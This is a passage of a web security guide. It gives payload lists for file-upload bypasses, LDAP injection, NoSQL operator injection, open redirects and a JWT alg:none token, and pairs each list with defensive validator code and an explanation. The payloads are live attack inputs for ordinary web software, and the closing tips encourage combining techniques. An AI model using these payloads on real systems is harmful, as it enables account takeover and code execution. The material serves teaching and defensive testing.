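def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a token (used here only to build test fixtures)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_hs256(token: str, key: bytes, now: float = None) -> dict:
    """Verify against the server's configured algorithm and return the claims.
    Rejects alg 'none' or any alg other than HS256 (attacks 1 and 4: we decide the key
    type, so an RSA public key can never be used as an HMAC key), a bad or empty
    signature, and a missing or past 'exp' (attack 5: editing exp also breaks the signature)."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
        signature = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError) as e:
        raise ValueError("malformed token") from e
    if header.get("alg") != REQUIRED_ALG:
        raise ValueError(f"algorithm {header.get('alg')!r} not accepted")
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        raise ValueError("bad signature")
    now = time.time() if now is None else now
    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        raise ValueError("token expired or has no exp")
    return claims


def token_status(token: str, key: bytes, now: float = None) -> str:
    """'ok', or the reason the token was rejected."""
    try:
        verify_hs256(token, key, now)
        return "ok"
    except ValueError as e:
        return str(e)


# The alg:none token from the block above (copied for the demo).
NONE_TOKEN = "eyJhbGciOiJub25lIn0.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFkbWluIn0."


if __name__ == "__main__":
    key = b"constructed-demo-key"
    tok = sign_hs256({"sub": "42", "exp": 2000}, key)
    print(token_status(tok, key, now=1000), "|", token_status(NONE_TOKEN, key, now=1000))
```

A deployment that uses RS256 applies the same rule in mirror image: the verifier calls an RSA-verify routine with the configured public key and rejects any header that says otherwise, so a token re-labelled `HS256` fails before any key is touched. Attack 2 (a guessable HMAC secret) is addressed by key length and entropy, not by verifier logic; a 256-bit random secret is the usual floor for HS256.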
## Upload Bypass Techniques

```text
# Extension bypass
file.php → file.php.jpg
file.php → file.jpg.php
file.php → file.phtml
file.php → file.php5
file.php → file.shtml
# MIME type bypass
Actual file: PHP shell
MIME header: image/jpeg
# Double extension
file.php.jpg
file.jpg.php
# Null byte injection (older systems)
file.php%00.jpg
# Case variation
file.PhP
file.pHp
# Content-Type header manipulation
Content-Type: image/jpeg (for PHP file)
# Image polyglot
# Valid JPEG + PHP code appended
```
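The bypasses above target three separate weak checks: a blocklist of extensions, trust in the client's `Content-Type`, and reuse of the client's filename on disk. This is an added example (not code from the page or the project) of an upload validator that replaces all three: an allow-list of the lower-cased final extension, a magic-byte check on the actual content, and a server-generated filename. The `ALLOWED` table and `validate_upload` are constructed; the polyglot case is discussed in the note after the block because content sniffing alone does not stop it.

```python
import secrets

# Constructed allow-list: extension -> bytes the file must begin with.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def validate_upload(filename: str, data: bytes, client_content_type: str = ""):
    """Return a server-generated filename to store the upload under, or None to reject.
    - the extension is the *last* suffix, lower-cased, and must be on the allow-list
      (file.PhP, file.php5, file.phtml, file.jpg.php all fail; file.php.jpg passes the
      name check but then fails the content check),
    - the content must start with that format's magic bytes (a PHP file sent with
      Content-Type: image/jpeg fails; the client's Content-Type is ignored entirely),
    - a NUL anywhere in the name is rejected, and the original name never reaches disk."""
    if "\x00" in filename:
        return None
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    magic = ALLOWED.get(ext)
    if magic is None or not data.startswith(magic):
        return None
    return f"{secrets.token_hex(16)}.{ext}"


# Constructed sample contents.
JPEG_STUB = b"\xff\xd8\xff\xe0" + b"\x00" * 16
PHP_STUB = b"<?php echo 1; ?>"


if __name__ == "__main__":
    for name, data, ctype in [
        ("photo.jpg", JPEG_STUB, "image/jpeg"),
        ("file.php.jpg", PHP_STUB, "image/jpeg"),
        ("file.jpg.php", JPEG_STUB, "image/jpeg"),
        ("file.PhP", PHP_STUB, "image/jpeg"),
        ("file.php\x00.jpg", JPEG_STUB, "image/jpeg"),
    ]:
        print(f"{name!r:20} -> {validate_upload(name, data, ctype)}")
```

The last entry in the page's list, a valid JPEG with PHP appended, passes this validator by design: its magic bytes are genuine. That case is closed by where the file lands rather than by inspection: uploads are stored outside the web root or in a location whose handler configuration never executes scripts, and are served with a fixed `Content-Type` and `X-Content-Type-Options: nosniff`. Re-encoding images through an image library on the way in also strips appended payloads.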
## LDAP Injection

```text
# Basic LDAP injection
cn=admin*)(uid=*))(&(uid=*
# Filter becomes: (&(cn=admin*)(uid=*))(&(uid=*)(password=*))
# Wildcard bypass
cn=*
uid=*
mail=*
# Blind LDAP injection
cn=admin)(|(uid=*))(&(uid=*)
# Bypass authentication
# Time-based blind
cn=admin)(|(cn=*&(objectclass=*))
```
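The payloads above work because `*`, `(`, `)` and `\` carry filter syntax, so an unescaped value can close one assertion and open another. RFC 4515 defines the escaping that keeps a value a value. This is an added example (not code from the page or the project) of that escaping applied before a filter is assembled; `escape_ldap_filter_value` and `login_filter` are constructed names, and `PROBE` is a copy of the first payload above. Distinguished-name components use the separate RFC 4514 rules and are not covered here.

```python
def escape_ldap_filter_value(value: str) -> str:
    """RFC 4515 escaping for a value placed inside a search filter: the four
    syntax characters and NUL become backslash-hex escapes, so the input can only
    ever be compared, never restructure the filter."""
    out = []
    for ch in value:
        if ch in "*()\\\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def login_filter(username: str) -> str:
    """Assemble the lookup filter with the escaped value. Authentication itself should
    then be a bind with the found DN, never a filter on a password attribute."""
    return "(&(objectClass=person)(uid=%s))" % escape_ldap_filter_value(username)


# Copy of the first payload from the block above.
PROBE = "admin*)(uid=*))(&(uid=*"


if __name__ == "__main__":
    print(login_filter("alice"))
    print(login_filter(PROBE))
```

After escaping, the probe is looking for a user whose `uid` literally equals `admin*)(uid=*))(&(uid=*`, which matches nothing. The wildcard-only payloads (`cn=*`) are neutralised the same way, since `*` becomes `\2a` and loses its wildcard meaning.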
## NoSQL Injection

### MongoDB

```javascript
// String concatenation injection
db.users.find({username: "' + username + '", password: "' + password + '"})
// Payload: {"$ne": null}
// Query becomes: {username: {$ne: null}, password: {$ne: null}}

// Operator injection
username: {$gt: ""}
password: {$gt: ""}

// JavaScript evaluation
db.users.find({$where: "this.username == '" + username + "'"})
// Payload: ' || '1'=='1

// Aggregation pipeline injection
db.collection.aggregate([{$match: {username: userInput}}])
```
### CouchDB

```text
// Mango query injection
{"selector": {"username": {"$eq": userInput}}}
// Payload: {"$gt": null}
// Map/reduce injection
_design/users/_view/all?key={"username":"admin"}
```
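The operator payloads for both MongoDB and CouchDB above rely on the server accepting a JSON *object* where it expected a *string*, so that `{"$ne": null}` or `{"$gt": ""}` is passed through as a query operator. The fix is a type check on the request body before any query is built, and a query shape that uses explicit equality. This is an added example (not code from the page or the project) of that validation; `parse_login`, `login_body_is_valid` and `build_query` are constructed names, and the query dict is shown in the generic `{"field": {"$eq": value}}` form used by both databases.

```python
import json


class BadRequest(ValueError):
    pass


def parse_login(body: str) -> dict:
    """Decode a JSON login body and insist that credential fields are plain strings.
    A dict such as {"$ne": null} is exactly what turns the field into an operator,
    so any non-string type (dict, list, number, null) is refused before the query exists."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError as e:
        raise BadRequest("body is not JSON") from e
    if not isinstance(data, dict):
        raise BadRequest("body must be an object")
    cleaned = {}
    for field in ("username", "password"):
        value = data.get(field)
        if not isinstance(value, str) or not value or len(value) > 256:
            raise BadRequest(f"{field} must be a non-empty string")
        cleaned[field] = value
    return cleaned


def login_body_is_valid(body: str) -> bool:
    try:
        parse_login(body)
        return True
    except BadRequest:
        return False


def build_query(creds: dict) -> dict:
    """Explicit equality on the already-typed username. The password is never part of
    the query; it is checked against a stored hash after the record is fetched."""
    return {"username": {"$eq": creds["username"]}}


# Constructed sample bodies: the operator payloads from the blocks above, and a normal login.
OPERATOR_BODY = '{"username": {"$ne": null}, "password": {"$ne": null}}'
GT_BODY = '{"username": {"$gt": ""}, "password": {"$gt": ""}}'
NORMAL_BODY = '{"username": "alice", "password": "correct horse"}'


if __name__ == "__main__":
    for body in [NORMAL_BODY, OPERATOR_BODY, GT_BODY]:
        print(f"{body:60} valid={login_body_is_valid(body)}")
    print(build_query(parse_login(NORMAL_BODY)))
```

Form-encoded bodies need the same care: frameworks that parse `username[$ne]=1` into a nested object reintroduce the problem, so the type check belongs after the framework's parsing, on the value the query code actually receives. The `$where` and aggregation cases are different in kind (server-side JavaScript or pipeline stages built from input) and are addressed by not exposing those features to request data at all.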
## Open Redirect

```text
# Parameter-based
?redirect=http://attacker.com
?next=http://attacker.com
?url=http://attacker.com
?return=http://attacker.com
# Whitelist bypass
?redirect=http://legitsite.com.attacker.com
?redirect=http://attacker.com@legitsite.com
?redirect=http://attacker.com#@legitsite.com
?redirect=//attacker.com (protocol-relative URL)
# Unicode/encoding bypass
?redirect=http://%61%74%74%61%63%6b%65%72.com
?redirect=http://attacker.com%00legitsite.com
# Javascript protocol
?redirect=javascript:alert('XSS')
```
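The bypass list above is a catalogue of ways a string can look like a trusted URL to a prefix or substring check while a browser parses it differently. A validator that parses the URL the way the browser will, and that prefers same-site relative paths over absolute URLs, is not fooled by any of them. This is an added example (not code from the page or the project); `TRUSTED_HOSTS` and `safe_redirect_target` are constructed for the demo.

```python
from urllib.parse import unquote, urlsplit

# Constructed allow-list of hosts that may appear in an absolute redirect target.
TRUSTED_HOSTS = {"legitsite.example"}


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Return a redirect target that stays on our site, else `default`.
    Accepts a same-site absolute path (single leading '/', not '//' or '/\\', which
    browsers read as protocol-relative) or an http(s) URL whose parsed hostname is on
    the allow-list and that carries no userinfo. The value is percent-decoded once
    first, so '%61ttacker' is judged after decoding, and any control character
    (including NUL) rejects the whole value."""
    value = unquote(raw or "").strip()
    if not value or any(ord(c) < 0x20 or c == "\x7f" for c in value):
        return default
    if value.startswith("/") and not value.startswith(("//", "/\\")):
        return value
    parts = urlsplit(value)
    if parts.scheme not in ("http", "https"):
        return default                       # javascript:, data:, and scheme-less values
    if parts.username is not None:
        return default                       # http://attacker@legitsite and friends
    if parts.hostname in TRUSTED_HOSTS:
        return value
    return default


if __name__ == "__main__":
    for probe in [
        "/account/settings",
        "//attacker.example",
        "http://legitsite.example.attacker.example",
        "http://attacker.example@legitsite.example",
        "http://attacker.example#@legitsite.example",
        "http://%61%74%74%61%63%6b%65%72.example",
        "http://attacker.example%00legitsite.example",
        "javascript:alert('XSS')",
        "https://legitsite.example/dashboard",
    ]:
        print(f"{probe!r:50} -> {safe_redirect_target(probe)}")
```

The strongest form of this control removes the URL from the request entirely: store the post-login destination server-side keyed by the session, or accept only a short identifier that maps to a known path. Where an absolute URL must be accepted, the exact-host comparison on the parsed hostname is the check; a regular expression over the raw string is what the first three bypasses are built for.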
## Finding PayloadsAllTheThings

- GitHub: https://github.com/swisskyrepo/PayloadsAllTheThings
- Regular Updates: Community maintains current bypasses and techniques
- Local Mirror: Clone for offline reference during assessments
- Search: Use repository search to find payloads by vulnerability type
## Best Practices

- Always test in authorized environments only
- Understand the payload before using it
- Combine techniques for maximum effectiveness
- Keep the repository updated regularly
- Document payloads used in your assessments
- Modify payloads for target-specific contexts
- Validate findings with proper exploitation steps